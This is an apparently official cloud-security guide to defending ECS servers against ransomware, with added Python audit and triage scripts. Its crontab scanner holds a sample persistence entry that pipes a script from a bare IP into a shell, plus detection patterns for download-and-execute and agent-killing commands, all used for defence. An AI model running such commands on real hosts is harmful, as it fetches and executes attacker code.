After ransomware intrudes into an Elastic Compute Service (ECS) instance, it encrypts the data on the instance and the attackers demand a ransom for the decryption key. This causes service interruptions, data leaks, and data loss. This topic describes the solutions that you can use to protect your ECS instances from ransomware.

Causes

In most cases, ransomware intrudes into ECS instances through risks that are introduced in the way the instances are configured and used. The following list describes the risks:
  • Important accounts with weak passwords or no authentication
    • Weak passwords or no passwords are configured for the important accounts of your server, such as the root account on Linux and the administrator account on Windows.
    • Weak passwords or no passwords are configured for the databases that important services depend on, such as Redis, MongoDB, MySQL, and Microsoft SQL Server.
  • Services exposed on the Internet because no access control policies are configured

    Services such as RDP, SSH, Redis, MongoDB, MySQL, and Microsoft SQL Server are reachable from the Internet. Attackers can brute-force the weak credentials of an exposed service or exploit vulnerabilities in it directly.

  • High-risk vulnerabilities in the operating systems and software of your servers

    High-risk vulnerabilities exist in the operating systems and software on your servers. Attackers exploit the vulnerabilities remotely to upload and run encryption ransomware.

Solutions

To reduce the likelihood that encryption ransomware compromises your ECS instances, we recommend that you adopt the suitable solutions and handle risks in each protection phase. The following list describes the anti-ransomware solutions for each protection phase, with the sections of this topic that describe them.

Protection phase: Before ransomware intrusion
  • Solution: Check security configurations.
    Description: Security Center provides the features of asset exposure analysis, baseline check, configuration assessment, and AccessKey pair leak detection. You can use the features to:
      • Ensure that no weak passwords or password-free access are configured for the accounts of your servers or databases, so that the accounts that can access important services are secure.
      • Ensure that unauthorized access is blocked and that no service is exposed on the Internet unless it has to be.
    References: Asset exposure analysis, Baseline check, Configuration assessment, AccessKey pair leak detection
  • Solution: Scan servers for vulnerabilities and fix detected vulnerabilities at the earliest opportunity.
    Description: Security Center provides the vulnerability fixing feature. If Security Center detects vulnerabilities on your servers, we recommend that you use the feature to fix high-risk vulnerabilities first.
    References: Configure scheduled vulnerability detection, Priorities to fix vulnerabilities, Exploitability of vulnerabilities
  • Solution: Create anti-ransomware policies for servers and databases.
    Description: Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases. The policies back up the protected data so that it can be restored if ransomware encrypts it.
    References: Backups based on anti-ransomware policies
  • Solution: Enable the features of the proactive defense module.
    Description: Security Center provides the proactive defense module. Its features automatically intercept common viruses, malicious network connections, and webshell connections, and use bait files to capture ransomware. Security Center also provides the virus blocking feature, which can precisely block ransomware.
    References: Proactive defense

Protection phase: During ransomware intrusion
  • Solution: Handle alerts generated by Security Center at the earliest opportunity.
    Description: Security Center generates different types of alerts for your assets in real time, including alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and act at the earliest opportunity.
    References: Alerts

Protection phase: After ransomware intrusion
  • Solution: Restore encrypted data of your assets.
    Description: Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases. You create anti-ransomware policies for your servers and databases, and Security Center backs up their data based on the policies. If ransomware encrypts the data on a server or database, you create a restoration task to restore the data from the backups.
    References: Backups based on anti-ransomware policies
  • Solution: Trace ransomware attacks.
    Description: Security Center provides the feature of attack source tracing. The feature reconstructs attack paths from the attack statistics collected by the Security Center agent and Graph Compute, so that you can view the processes and chain diagrams of a ransomware intrusion.
    References: Attack source tracing

The following sections describe the features and operations related to anti-ransomware solutions.

Asset exposure analysis

You can use asset exposure analysis to minimize the exposure of your assets and reduce intrusions over the Internet by attackers, mining programs, and worms. We recommend that you treat Internet-facing exposure as the highest priority and handle it first. For more information, see Asset exposure analysis.
  • Analysis of exposed components

    Asset exposure analysis lists the exposed components, so that you can check whether components or services such as Redis, MongoDB, and Elasticsearch are reachable from the Internet. If a component is exposed, cut off its Internet exposure. For example, configure the security group to allow requests only from specific CIDR blocks.

  • Analysis of exposed weak passwords

    If a system uses weak passwords and is exposed on the Internet, it can be compromised with little effort. Fix the risks caused by weak passwords at the earliest opportunity.
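
The following Python script is an added example, not Alibaba Cloud or Security Center code. It runs over the Permissions list of an ECS DescribeSecurityGroupAttribute response and flags the ingress rules that open the high-risk ports named in this topic to a public source, which is the same question asset exposure analysis answers for your assets. The field names (IpProtocol, PortRange, SourceCidrIp, Policy, Direction) are assumed to follow that API's response, and the sample rules are constructed.

```python
"""Audit ECS security group rules for high-risk services exposed to the Internet.

Added example (not Alibaba Cloud or Security Center code). It takes the
Permissions list of a DescribeSecurityGroupAttribute response; the field names
(IpProtocol, PortRange, SourceCidrIp, Policy, Direction) are assumed to follow
that API, and the sample rules below are constructed for this example.
"""
import ipaddress

# Services this topic names as common ransomware entry points, by default port.
HIGH_RISK_PORTS = {
    22: "SSH", 3389: "RDP", 6379: "Redis", 27017: "MongoDB",
    3306: "MySQL", 1433: "Microsoft SQL Server", 9200: "Elasticsearch",
}

# Source ranges that do not count as Internet exposure.
_INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]


def _port_range(spec):
    """Parse an ECS PortRange such as '6379/6379'; '-1/-1' means all ports."""
    lo, hi = (int(p) for p in spec.split("/"))
    return (1, 65535) if (lo, hi) == (-1, -1) else (lo, hi)


def is_public_source(cidr):
    """True unless the CIDR lies entirely inside private, loopback or link-local space.
    Deliberately avoids IPv4Network.is_private, which older Pythons report as True for
    0.0.0.0/0 because both end addresses fall inside 'special' ranges."""
    net = ipaddress.ip_network(cidr, strict=False)
    return not any(net.version == i.version and net.subnet_of(i) for i in _INTERNAL)


def exposed_services(permissions):
    """Return sorted (service, port, source_cidr) tuples for ingress accept rules that
    open a high-risk TCP port to a public source. Drop rules, egress rules and rules
    keyed to a source security group (no SourceCidrIp) are ignored."""
    findings = set()
    for rule in permissions:
        if rule.get("Direction", "ingress").lower() != "ingress":
            continue
        if rule.get("Policy", "Accept").lower() != "accept":
            continue
        if rule.get("IpProtocol", "").upper() not in ("TCP", "ALL"):
            continue
        cidr = rule.get("SourceCidrIp")
        if not cidr or not is_public_source(cidr):
            continue
        lo, hi = _port_range(rule["PortRange"])
        for port, service in HIGH_RISK_PORTS.items():
            if lo <= port <= hi:
                findings.add((service, port, cidr))
    return sorted(findings)


# Constructed sample shaped like the Permissions.Permission list of the API response.
SAMPLE_PERMISSIONS = [
    {"IpProtocol": "TCP", "PortRange": "22/22", "SourceCidrIp": "0.0.0.0/0",
     "Policy": "Accept", "Direction": "ingress"},
    {"IpProtocol": "TCP", "PortRange": "6379/6379", "SourceCidrIp": "0.0.0.0/0",
     "Policy": "Accept", "Direction": "ingress"},
    {"IpProtocol": "TCP", "PortRange": "3306/3306", "SourceCidrIp": "10.0.0.0/8",
     "Policy": "Accept", "Direction": "ingress"},          # internal only: fine
    {"IpProtocol": "TCP", "PortRange": "27017/27017", "SourceCidrIp": "0.0.0.0/0",
     "Policy": "Drop", "Direction": "ingress"},            # explicit deny: fine
    {"IpProtocol": "ALL", "PortRange": "-1/-1", "SourceCidrIp": "0.0.0.0/0",
     "Policy": "Accept", "Direction": "egress"},           # outbound: not exposure
    {"IpProtocol": "TCP", "PortRange": "1000/2000", "SourceCidrIp": "203.0.113.0/24",
     "Policy": "Accept", "Direction": "ingress"},          # wide range swallows 1433
]

if __name__ == "__main__":
    for service, port, cidr in exposed_services(SAMPLE_PERMISSIONS):
        print(f"{service} (tcp/{port}) reachable from {cidr}: restrict SourceCidrIp")
```

Each finding maps to one rule to tighten: replace the public source with the specific CIDR blocks that need access, or remove the rule and reach the service through a bastion host. Wide port ranges are worth a second look because they quietly cover database ports, as the last sample rule shows.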

Baseline check

You can use the baseline check feature to check the baseline configurations that are included in the default baseline check policy for risks such as weak passwords, unauthorized access, vulnerabilities, and configuration risks. Fixing the detected baseline risks in your system, databases, and software is an efficient way to prevent ransomware. For more information, see Overview.

Configuration assessment

You can use the configuration assessment feature to check the following configurations of your Alibaba Cloud services for risks: identity authentication and permissions, network access control, data security, log audit, monitoring and alerting, and basic security protection. If risks are detected, Security Center provides solutions. We recommend that you handle the detected high-risk items first. For more information, see Overview.

AccessKey pair leak detection

You can use the feature of AccessKey pair leak detection to check in real time whether AccessKey pairs and other credentials, such as usernames and passwords, for your assets appear in source code hosted on platforms such as GitHub. If a leak is detected, Security Center generates an alert, so that you can revoke or rotate the leaked credentials at the earliest opportunity. For more information, see Detection of AccessKey pair leaks.

Configure scheduled vulnerability detection

We recommend that you enable application vulnerability detection and set the scheduled detection cycle to the minimum, which is three days. Also review the vulnerability whitelist and make sure that every entry on it is genuinely necessary, because whitelisted vulnerabilities are not reported. For more information, see Configure vulnerability settings.

Priorities to fix vulnerabilities

Detected application vulnerabilities are classified by whether they can be easily exploited. For a vulnerability that can be easily exploited, the details are displayed in the Security Center console, and a Proof of Concept (PoC) or exploit is readily available on the Internet. Such vulnerabilities are the first targets of attackers, mining programs, and worms, so fix them first, in descending order of their urgency score. Also fix the vulnerabilities detected on services that are not exposed on the Internet: an intruder who has already gained a foothold exploits them to move laterally in your internal network, and fixing them limits the damage to your assets. For more information, see Priorities to fix vulnerabilities.

Exploitability of vulnerabilities

If a large number of vulnerabilities are detected and you do not have the resources to fix all of them at once, first fix or handle the vulnerabilities that affect security at the Internet boundary. This secures the boundary and buys time to fix the remaining vulnerabilities on your system. The following list describes the difference between fixing and handling a vulnerability:
  • Fix vulnerabilities

    Follow the solution included in the vulnerability details.

  • Handle vulnerabilities

    Click the ID of a security group or an instance to go to the configuration page of the security group, Server Load Balancer (SLB) instance, or Network Address Translation (NAT) gateway. On that page, delete the port forwarding rule that exposes the service on the Internet, or configure the security group to allow requests only from specific IP addresses or CIDR blocks. Handling a vulnerability only removes its Internet exposure; the vulnerability itself still needs to be fixed.

    For more information about how to fix a vulnerability, see Overview.
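
To make the ordering described in the two sections above concrete, the following Python example (added here, not Security Center code) splits constructed vulnerability records into an Internet-boundary set and an internal set, orders each by exploitability and urgency score, and lists the exposed ports to handle in the security group before the fixes land. The record fields (id, service, urgency, poc_public, port) and the set of exposed ports are assumptions made for the example; in practice the urgency score and exploitability come from the Security Center console and the exposed ports from asset exposure analysis.

```python
"""Triage detected vulnerabilities: boundary first, easily exploitable first, then urgency.

Added example, not Security Center code. Record fields and sample values are
constructed; INTERNET_EXPOSED_PORTS stands in for the asset exposure analysis result.
"""

# Constructed sample: one record per detected vulnerability.
SAMPLE_VULNS = [
    {"id": "V1", "service": "Redis",   "urgency": 9.1, "poc_public": True,  "port": 6379},
    {"id": "V2", "service": "SSH",     "urgency": 7.4, "poc_public": False, "port": 22},
    {"id": "V3", "service": "kernel",  "urgency": 8.8, "poc_public": True,  "port": None},
    {"id": "V4", "service": "MySQL",   "urgency": 5.2, "poc_public": False, "port": 3306},
    {"id": "V5", "service": "web app", "urgency": 9.6, "poc_public": True,  "port": 8080},
]

# Constructed: ports that asset exposure analysis reports as reachable from the Internet.
INTERNET_EXPOSED_PORTS = {6379, 22}


def _fix_key(vuln):
    """Sort key: public PoC/exploit first (False sorts before True), then higher urgency."""
    return (not vuln["poc_public"], -vuln["urgency"])


def triage(vulns, exposed_ports):
    """Return (boundary_ids, internal_ids).

    boundary: vulnerabilities on a service reachable from the Internet. Handle them
              immediately (restrict the port in the security group), then fix them.
    internal: everything else. Still fix them, in the same order, to deny an intruder
              lateral movement inside the VPC.
    Each list is ordered easily-exploitable first, then by urgency score descending."""
    boundary = sorted((v for v in vulns if v["port"] in exposed_ports), key=_fix_key)
    internal = sorted((v for v in vulns if v["port"] not in exposed_ports), key=_fix_key)
    return [v["id"] for v in boundary], [v["id"] for v in internal]


def handle_first(vulns, exposed_ports):
    """Ports to restrict in the security group before any patch is applied: exposed
    ports carrying a vulnerability with a public PoC or exploit."""
    return sorted({v["port"] for v in vulns
                   if v["port"] in exposed_ports and v["poc_public"]})


if __name__ == "__main__":
    boundary, internal = triage(SAMPLE_VULNS, INTERNET_EXPOSED_PORTS)
    print("restrict now (security group):", handle_first(SAMPLE_VULNS, INTERNET_EXPOSED_PORTS))
    print("fix order, Internet boundary :", boundary)
    print("fix order, internal          :", internal)
```

Note that V5 has the highest urgency score but is not exposed, so it lands at the top of the internal list rather than ahead of the boundary items; a vulnerability reachable from the Internet with a public exploit is the one most likely to be the ransomware's entry point.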

Alerts

Security Center generates different types of alerts for your assets in real time. The types of alerts include the alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take actions at the earliest opportunity.

You can perform the following steps to handle alerts on ransomware:

  1. Log on to the Security Center console.
  2. In the left-side navigation pane, choose Detection > Alerts.
  3. In the alert list of the Alerts page, find the alert on ransomware and click Process in the Actions column.
  4. In the dialog box that appears, set Process Method to Anti-Virus and select Isolate the source file of the process.
  5. Click Process Now.
    After you isolate the source file of a malicious process, the process can no longer be started.
  6. Log on to the server on which the alert is generated and check whether a suspicious scheduled task exists in the crontab file.
    If a suspicious scheduled task exists, you must delete or comment out the task.
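
Step 6 is a manual review of the crontab. The following Python script is an added example, not part of Security Center: it applies a few persistence heuristics to `crontab -l` output and comments out the entries that match, so the task stops running while the evidence stays in the file for attack source tracing. The indicator patterns and the sample crontab are constructed for the example; review every hit before disabling it, and remember that system crontabs (/etc/crontab, /etc/cron.d) carry an extra user field that this parser does not handle.

```python
"""Scan a user crontab for ransomware persistence and comment out the suspect entries.

Added example, not Security Center code. The indicator patterns are generic
heuristics chosen for this example, and SAMPLE_CRONTAB is constructed.
"""
import re

# (pattern, reason) pairs. Heuristics, not a complete signature set.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b"),
     "downloads a script and pipes it into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes base64 at run time"),
    (re.compile(r"(^|[\s=])/(tmp|var/tmp|dev/shm)/"),
     "runs something from a world-writable directory"),
    (re.compile(r"(^|\s)(https?://)?(\d{1,3}\.){3}\d{1,3}(:\d+)?/"),
     "fetches from a bare IP address"),
    (re.compile(r"\b(pkill|killall)\b|\bsystemctl\s+(stop|disable)\b"),
     "kills or disables services (often the security agent)"),
    (re.compile(r"\bchattr\s+[-+]i\b"), "toggles the immutable flag"),
]

_ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Return (line_no, schedule, command) for each active entry of a user crontab
    (`crontab -l` format: five time fields or an @keyword, then the command).
    Comments, blank lines and VAR=value lines are skipped."""
    entries = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or _ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            parts = [" ".join(fields[:5]), fields[5]] if len(fields) == 6 else []
        if len(parts) == 2:
            entries.append((no, parts[0], parts[1]))
    return entries


def suspicious_entries(text):
    """Return [(line_no, command, [reasons])] for entries matching any indicator."""
    hits = []
    for no, _schedule, cmd in parse_crontab(text):
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        if reasons:
            hits.append((no, cmd, reasons))
    return hits


def disable_entries(text, line_nos, tag="# disabled (ransomware response): "):
    """Comment out the given 1-based lines so the tasks no longer run, keeping the
    original text in place as evidence."""
    lines = text.splitlines()
    for no in line_nos:
        lines[no - 1] = tag + lines[no - 1]
    return "\n".join(lines)


# Constructed sample: what `crontab -l` might print on a compromised host.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "0 2 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * curl -fsSL http://198.51.100.7/x.sh | sh",
    "@reboot /dev/shm/.x/kthreadd -c /dev/shm/.x/cfg",
    "30 3 * * 0 /opt/backup/run.sh",
])

if __name__ == "__main__":
    hits = suspicious_entries(SAMPLE_CRONTAB)
    for no, cmd, reasons in hits:
        print(f"line {no}: {cmd}\n    " + "; ".join(reasons))
    print(disable_entries(SAMPLE_CRONTAB, [no for no, _, _ in hits]))
```

Run it against the saved output of `crontab -l` for root and for every user that owns a crontab, then write the cleaned text back with `crontab <file>` for that user. The download-and-pipe entry is the classic way ransomware and miners re-fetch their payload after the isolated file is removed, which is why step 6 follows the isolation in step 5.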

Proactive defense

Security Center provides the proactive defense module. The features that are supported by the module can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature. You can use the feature to block ransomware before a ransomware attack occurs. For more information about how to enable the virus blocking feature, see Use proactive defense.

Ransomware may try to stop or tamper with the Security Center agent to evade detection. We recommend that you enable the client protection feature, which protects the agent. For more information about how to enable the client protection feature, see Use the client protection feature.

Backups based on anti-ransomware policies

Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases to defend against ransomware. You can use the features to protect your servers and databases from ransomware.
  • Anti-ransomware for servers

    You can use the anti-ransomware feature of Security Center to create anti-ransomware policies for your server. The server can be an ECS instance, a server that is not deployed on Alibaba Cloud, a server that is deployed in the classic network, or a server that is deployed in a virtual private cloud (VPC). After you create an anti-ransomware policy, Security Center automatically backs up data in protected directories on your server. If your server is attacked by ransomware, you can restore data based on the backups. This prevents negative impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.

  • Anti-ransomware for databases

    You can create anti-ransomware policies for the following types of databases that are deployed on ECS instances to back up data in the databases: MySQL, Oracle, and SQL Server databases. If your database is intruded by ransomware, you can restore data in the database based on the backups. This prevents adverse impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.

Configuration suggestions
  • Data backup consumes network bandwidth. Set the Start Time parameter of the anti-ransomware policy to a point in time within off-peak hours, and avoid the start of an hour. The first full backup, or an incremental backup that covers a large number of files, may take several hours.
  • Specify only the directories that actually need protection when you create an anti-ransomware policy. This conserves anti-ransomware capacity and minimizes the performance impact on your server.
  • Check the anti-ransomware capacity on a regular basis to ensure that it remains sufficient. If the capacity is insufficient and you neither purchase additional capacity nor delete backup data to release capacity, data backup stops. Backup data is automatically deleted after the specified retention period.
  • If a protected directory on an ECS instance contains a mount point for an Apsara File Storage NAS (NAS) file system or an Object Storage Service (OSS) bucket, the data in the NAS file system or OSS bucket is backed up as well. Exclude mount directories from the protected directories, or protect only the necessary data under the mount directories.
  • A large number of data fragments can cause high disk space, log storage, and memory usage. Clear backup caches from your disks on a regular basis. For more information, see Release disk space occupied by backup caches.
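
The mount-point suggestion above is easy to get wrong by hand on a server with several network mounts. As an added example (not Security Center code), the following Python function reads /proc/mounts-style lines and, for the directories you intend to protect, returns the network mount points to put on the policy's exclusion list and warns when a protected directory is itself a network mount. The set of filesystem type names treated as network storage and the sample mount table are assumptions made for this example (NAS typically appears as nfs or nfs4 and ossfs as fuse.ossfs, but verify against your own `cat /proc/mounts`).

```python
"""Decide which mount points to exclude from an anti-ransomware policy's protected directories.

Added example, not Security Center code. Reads /proc/mounts-style lines
(device, mount point, fstype, options, dump, pass). NETWORK_FS and SAMPLE_MOUNTS
are assumptions constructed for this example.
"""
from pathlib import PurePosixPath

# Filesystem types whose data lives in NAS, OSS or another remote store (assumed list).
NETWORK_FS = {"nfs", "nfs4", "cifs", "smb3", "fuse.ossfs", "fuse.s3fs", "fuse.sshfs"}


def parse_mounts(text):
    """Return (mount_point, fstype) pairs. /proc/mounts escapes spaces in paths as \\040."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 3:
            mounts.append((fields[1].replace("\\040", " "), fields[2]))
    return mounts


def plan_protected_dirs(protect, mounts_text):
    """Given the directories you intend to protect, return (exclude, warnings).

    exclude  - network mount points nested under a protected directory; add them to
               the policy's exclusion list so NAS/OSS contents are not copied into
               anti-ransomware capacity.
    warnings - protected directories that are themselves network mounts; narrow
               them to the subdirectories that actually need protection."""
    remote = [(mp, fs) for mp, fs in parse_mounts(mounts_text) if fs in NETWORK_FS]
    exclude, warnings = set(), []
    for d in protect:
        p = PurePosixPath(d)
        for mp, fs in remote:
            m = PurePosixPath(mp)
            if m == p:
                warnings.append(f"{d} is a {fs} mount; protect only the needed subdirectories")
            elif p in m.parents:
                exclude.add(mp)
    return sorted(exclude), warnings


# Constructed sample in /proc/mounts format.
SAMPLE_MOUNTS = "\n".join([
    "/dev/vda1 / ext4 rw,relatime 0 0",
    "/dev/vdb1 /data ext4 rw,relatime 0 0",
    "nas-mount-target.example:/ /data/shared nfs4 rw,vers=4.0 0 0",
    "ossfs /data/media fuse.ossfs rw,nosuid,nodev 0 0",
    "tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0",
])

if __name__ == "__main__":
    exclude, warnings = plan_protected_dirs(["/data", "/etc", "/var/www"], SAMPLE_MOUNTS)
    print("add to exclusion list:", exclude)
    for w in warnings:
        print("warning:", w)
```

Run it with the directory list you plan to enter in the policy and the current contents of /proc/mounts on the instance; re-run it whenever a new NAS file system or OSS bucket is mounted, because a mount added after the policy was created silently widens what gets backed up.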

Attack source tracing

Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. For more information, see Use attack source tracing.